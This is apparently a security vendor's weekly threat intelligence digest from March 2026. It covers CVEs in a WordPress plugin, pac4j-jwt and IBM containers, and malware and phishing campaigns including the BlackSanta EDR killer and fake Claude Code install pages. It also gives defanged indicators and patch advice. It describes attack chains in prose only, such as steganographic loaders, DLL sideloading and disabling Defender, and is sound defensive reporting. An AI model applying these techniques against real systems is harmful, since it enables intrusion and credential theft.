Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Threat Actors Exploit WordPress Plugin Vulnerability CVE-2026-1492 to Create Administrator Accounts Without Authentication - On 3 March 2026, Wordfence updated its advisory regarding a critical vulnerability, tracked as CVE-2026-1492, in the User Registration & Membership plugin (versions 5.1.2 and earlier) and warned that threat actors had begun exploiting it. According to Wordfence telemetry, 78 exploitation attempts were blocked within a recent 24-hour period.
The vulnerability is caused by improper privilege management. The plugin accepts a user-supplied role during membership registration but fails to enforce a server-side allowlist. If exploited successfully, unauthenticated attackers can create administrator accounts and gain full control of the affected WordPress site. The plugin developer addressed the issue in version 5.1.3 and subsequently released version 5.1.4.
pac4j-jwt Patches Authentication Bypass Vulnerability (CVE-2026-29000) - On 3 March 2026, CodeAnt AI disclosed details and a proof-of-concept exploit for CVE-2026-29000, a critical authentication bypass vulnerability affecting pac4j-jwt in versions prior to 4.5.9, 5.7.9, and 6.3.3. pac4j-jwt is a Java library that provides JSON Web Token authentication for applications.
Successful exploitation allows threat actors who possess the server’s RSA public key to forge JSON Web Tokens that bypass signature verification, enabling them to authenticate as any user with elevated privileges. The vendor addressed the vulnerability in versions 4.5.9, 5.7.9, and 6.3.3, and there have been no reports of active exploitation at the time of writing.
IBM Patches Information Disclosure Vulnerability CVE-2025-36105 Affecting IBM Planning Analytics Advanced Certified Containers - On 6 March 2026, IBM patched an information disclosure vulnerability tracked as CVE-2025-36105, affecting IBM Planning Analytics Advanced Certified Containers versions 3.1.0 to 3.1.4. Exploitation of the vulnerability could allow threat actors to obtain sensitive information from environment variables. At the time of writing, there are no reports of this vulnerability being exploited in the wild.
To mitigate the risk of exploitation, Insikt Group recommends updating IBM Planning Analytics Advanced Certified Containers to version 3.1.5.
Potential Threats
Threat Actor Targets HR and Recruitment Personnel With Resume-Themed ISO Lures Delivering BlackSanta EDR Killer Module - On 10 March 2026, Aryaka Threat Labs reported a resume-themed malware campaign targeting human resources and recruitment personnel. The campaign deployed BlackSanta, an endpoint detection and response killer module that terminates security tools before downloading additional executables from threat actor-controlled command-and-control infrastructure. Aryaka noted the campaign had been active for over a year and linked it to a Russian-speaking threat actor based on language cues and code artifacts.
The threat actor distributed ISO files via spearphishing links on cloud storage services. When a user executed a PDF-themed Windows shortcut, a hidden PowerShell instance ran, extracting data from a PNG file using steganography. This downloaded a ZIP archive containing a legitimate SumatraPDF executable and a malicious DWrite.dll, triggering DLL sideloading. The malware fingerprinted the host, communicated with a C2 server for AES keys, validated the environment, disabled Windows Defender protections, and queried memory integrity. It pulled additional executables from multiple C2 endpoints and used BlackSanta to gain kernel-level access and terminate security processes.
Threat Actors Employ Malvertising to Distribute Amatera Stealer via InstallFix Technique - On 6 March 2026, Push Security published an analysis of a malvertising campaign using “InstallFix” to distribute the Amatera Stealer malware via cloned installation pages for Anthropic’s Claude Code command-line interface tool. InstallFix involves replicating legitimate software installation pages and replacing trusted copy-and-paste commands with malicious ones that execute malware when run. Claude Code is a command-line AI coding assistant for developers and non-technical users. The campaign abused trusted “curl to bash” installation patterns, modifying legitimate commands to fetch payloads from threat actor-controlled infrastructure.
Threat actors cloned the official Claude Code installation page, hosted it on lookalike domains, and promoted them via Google Ads targeting searches like “Claude Code” and “Claude Code CLI.” Victims landing on these replica sites saw standard installation instructions, but the commands retrieved content from malicious domains instead of the legitimate claude.ai. On Windows, executing the command launched mshta.exe to fetch and run remote script content, supported by conhost.exe. On macOS, the command decoded a Base64 string, decompressed a payload, and ran it via Z Shell, which then downloaded a secondary binary to /tmp/ for execution. At the time of writing, the malicious domains and URLs returned error messages.
Threat Actors Conduct AitM Phishing Campaign Targeting AWS Management Console Credentials - On 9 March 2026, Datadog Security Research disclosed an active adversary-in-the-middle phishing campaign targeting Amazon Web Services Management Console credentials, first observed on 23 and 25 February 2026. The campaign used typosquatted domains that mimicked AWS naming conventions and shared registrar metadata across multiple infrastructure clusters. In one documented case, a threat actor accessed a compromised AWS account around 20 minutes after credentials were submitted, logging in via a VPN exit node. Datadog reported the campaign was still active at the time of publication, noting infrastructure changes on 26 February 2026.
The threat actors sent emails posing as AWS security messages, referencing unusual cross-account activity involving an Identity and Access Management role. Victims were redirected through several URLs, including an AWS SES click-tracking link, before reaching a counterfeit AWS sign-in page. The AitM kit acted as an intermediary, forwarding submitted credentials to the legitimate AWS service in real time and relaying responses back to the victim. The phishing pages also mirrored AWS’s OAuth sign-in flow, including PKCE parameters and AWS-hosted assets and styling, and Datadog observed an exposed management interface for the kit on TCP port 3000 used for campaign administration.
General News
Microsoft Teams will tag third-party bots trying to join meetings - Microsoft has announced that Teams will soon automatically tag third-party bots in meeting lobbies, giving organisers control over whether they can join. The feature, currently in development, is scheduled for rollout in May 2026 and will be available across Windows, macOS, Android, and iOS for standard multi-tenant and GCC cloud environments. Once implemented, external bots attempting to join a Teams meeting will be clearly labelled in the lobby, requiring organisers to explicitly allow them to enter rather than being admitted alongside human participants.
This change is designed to prevent malicious apps or third-party bots used for tasks such as note-taking or transcription from joining meetings without attendees’ knowledge. Microsoft stated that organisers will see a clear representation of bots in the lobby and must admit them separately, ensuring full control over non-human participants. Teams has also introduced other security features, including a call reporting function for flagging suspicious or unwanted calls, warnings about external callers impersonating trusted organisations, and the ability for admins to block external users through the Defender portal to prevent social engineering and ransomware attacks.
FBI investigates breach of surveillance and wiretap systems - The U.S. Federal Bureau of Investigation (FBI) confirmed on Thursday that it is investigating a breach affecting systems used to manage surveillance and wiretap warrants. The agency stated that it identified and addressed suspicious activity on its networks and has employed all available technical capabilities to respond, but declined to provide further details regarding the scope or impact of the incident. CNN, which first reported the breach, cited an anonymous source indicating that the compromised systems are involved in managing wiretapping and foreign intelligence surveillance warrants.
It is currently unclear whether this incident is linked to previous attacks, including those by the Chinese state-backed threat group Salt Typhoon, which in 2024 compromised U.S. federal systems used for court-authorised network wiretapping requests. Salt Typhoon also breached the networks of multiple U.S. telecommunications providers and international carriers, gaining access to private communications of some U.S. government officials. The FBI has faced prior cyber incidents, including a 2021 email server hack used to distribute spam impersonating the bureau and a 2023 investigation into malicious activity involving a New York Field Office system used for child sexual exploitation investigations.
Fake LastPass support email threads try to steal vault passwords - Password management provider LastPass is warning users of a phishing campaign targeting its customers with fake alerts about unauthorized account access. The emails impersonate LastPass representatives, often spoofing the display name and using subject lines designed to look like forwarded internal conversations regarding requests to change the account’s primary email address. Recipients are urged to respond quickly and click links such as “report suspicious activity,” “disconnect and lock vault,” and “revoke device,” which lead to a fake login page hosted on the domain “verify-lastpass[.]com” to capture credentials.
According to LastPass Threat Intelligence, Mitigation, and Escalation (TIME), attackers also use slightly altered URLs that redirect to the same phishing page. Multiple sender addresses and subject lines are employed to appear credible, often using compromised or abandoned domains while hiding behind the ‘LastPass Support’ display name. LastPass emphasised that its systems have not been compromised and reminded users that support agents will never request their master password. The company is working with partners to take down the fake sites and urges users to report suspicious communications to abuse@lastpass.com. Earlier campaigns this year and in late 2025 used fake maintenance notices, user death claims, and false hack alerts to target users.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| HAFNIUM | ● Moderate | → | ● Moderate | ● 59 | → | ● 55 | ● 25 | → | ● 25 |
| Secp0 Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 40 |
| Saparr | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 25 |
| AiLock Ransomware Group | ● Basic | → | ● Basic | ● 25 | → | ● 25 | ● 5 | → | ● 31 |
| BianLian Ransomware Group |
● Basic | → | ● Basic | ● 40 | → | ● 35 | ● 35 | → | ● 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| Iranian Hackers | ▲ | Ransomware | ▲ | CVE-2025-26399 | ▲ | Hebrew Academy | ▲ | |
| Handala Hack Team | ▲ | PlugX | ▲ | CVE-2025-59718 | ▲ | Consulting | ▲ | |
| Army Air Force | ▲ | Coruna | ▲ | CVE-2026-1603 | ▲ | ▲ | ||
| Lazarus Group | ▲ |
Stealware |
▲ | CVE-2025-49113 | ▲ | McKiney & Company | ▲ | |
| ShinyHunters | ▲ | Dindoor | ▲ | CVE-2026-21262 | ▲ | Signal | ▲ | |
Prominent Information Security Events
Threat Actor Targets HR and Recruitment Personnel With Resume-Themed ISO Lures Delivering BlackSanta EDR Killer Module
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66
IOC: IP - 157[.]250[.]202[.]215
On 10 March 2026, Aryaka Threat Labs reported a resume-themed malware campaign targeting human resources and recruitment personnel. The campaign deployed BlackSanta, an endpoint detection and response killer module that disables security tools before downloading additional executables from threat actor-controlled command-and-control infrastructure. Aryaka noted that the campaign had been active for over a year and attributed it to a Russian-speaking threat actor based on Russian-language comments and related code artifacts.
The attackers distributed ISO files via spearphishing links and hosted them on cloud storage services. When a user mounted the ISO and executed a PDF-themed Windows shortcut, a hidden PowerShell instance ran with an execution policy bypass, extracting embedded data from a PNG file using least significant bit steganography. The script then downloaded a ZIP archive containing a legitimate SumatraPDF executable and a malicious DWrite.dll, triggering DLL sideloading when the trusted executable loaded the local DLL. The malicious DLL fingerprinted the host, sent the data to a command-and-control endpoint, and received AES key material to enable runtime string decryption.
Once communications with the C2 server were established, the malware validated the environment by checking host and user identifiers, locale, virtualization artifacts, and debugger indicators. It modified Windows Defender SpyNet registry keys to disable cloud protection and automatic sample submission and checked the Hypervisor-Enforced Code Integrity registry value to determine whether Memory Integrity was enabled. The malware tracked execution state through registry values and environment variables, pulled additional executables from multiple C2 endpoints, and launched them using process hollowing. BlackSanta further loaded vulnerable drivers, including RogueKiller Antirootkit and IObitUnlocker.sys, to gain kernel-level access and terminate security and monitoring processes from a hard-coded list.
Threat Actors Conduct AitM Phishing Campaign Targeting AWS Management Console Credentials
Source: Insikt Group | Validated Intelligence Event
IOC: Domain -signin[.]aws[.]cloud-recovery[.]net
IOC: IP - 185[.]209[.]196[.]132
On 9 March 2026, Datadog Security Research disclosed an active adversary-in-the-middle phishing campaign targeting Amazon Web Services Management Console credentials, first observed on 23 and 25 February 2026. The campaign relied on typosquatted domains that mimicked AWS naming conventions and shared registrar metadata across multiple infrastructure clusters. In one documented case, a threat actor accessed a compromised AWS account approximately 20 minutes after credentials were submitted, signing in via a VPN exit node. Datadog reported that the campaign remained active at the time of publication and observed infrastructure changes on 26 February 2026.
The attackers sent emails posing as AWS security alerts, referencing unusual cross-account activity involving an Identity and Access Management role. The embedded links redirected victims through multiple URLs, including an AWS Simple Email Service click-tracking link, before delivering a counterfeit AWS sign-in page. The adversary-in-the-middle kit functioned as an intermediary, forwarding submitted credentials to the legitimate AWS sign-in service in real time and relaying responses back to the victim’s browser.
The phishing pages also replicated AWS’s OAuth sign-in flow, including Proof Key for Code Exchange (PKCE) parameters such as code_challenge with code_challenge_method=SHA-256, and used AWS-hosted assets and styling to closely mirror the official login page. Datadog additionally observed an exposed management interface for the kit on TCP port 3000, which was used to administer the campaign.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-1492 (WordPress) – This vulnerability can be addressed by updating the User Registration and Membership plugin to version 5.1.3 or later.
- CVE-2026-29000 (pac4j-jwt) – This vulnerability can be remediated by updating to versions 4.5.9, 5.7.9, and 6.3.3.
- CVE-2025-36105 (IBM Containers) – This vulnerability can be addressed by updating IBM Planning Analytics Advanced Certified Containers to version 3.1.5.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.